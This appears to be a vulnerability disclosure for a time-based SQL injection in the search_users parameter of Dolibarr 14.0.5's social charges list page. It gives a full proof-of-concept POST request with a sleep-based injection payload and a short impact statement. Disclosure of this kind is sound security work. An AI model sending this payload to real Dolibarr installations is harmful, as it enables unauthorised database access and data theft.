Description

The search_users parameter does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection.

Proof of Concept

Slow query example:

POST /dolibarr-14.0.5/htdocs/compta/sociales/list.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dolibarr.host.com/dolibarr-14.0.5/htdocs/
Cookie: DOLSESSID_fccaaf42bd9fa1c7b06bdc9c436940dd=mo7pn9rar97v28ol5a34qe0oa0; 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 478
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: dolibarr.host.com
Connection: Keep-alive

action=list&button_search_x=x&contextpage=sclist&formfilteraction=list&limit=1&pageplusoneold=1&search_amount=the&search_label=the&search_month_lim=7&search_project_ref=the&search_ref=&search_status=the&search_users[]=(select(0)from(select(sleep(0)))a)&search_year_lim=2027&selectedfields=cs.rowid%2Ccs.libelle%2Ccs.fk_type%2Ccs.date_ech%2Ccs.periode%2Cp.ref%2Ccs.fk_user%2Ccs.amount%2Ccs.paye%2C&sortfield=cs.date_ech&sortorder=DESC&token=7911ea6a297ad0d6edb116a22fe7e35ee7e35e

Impact

A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write script to extract data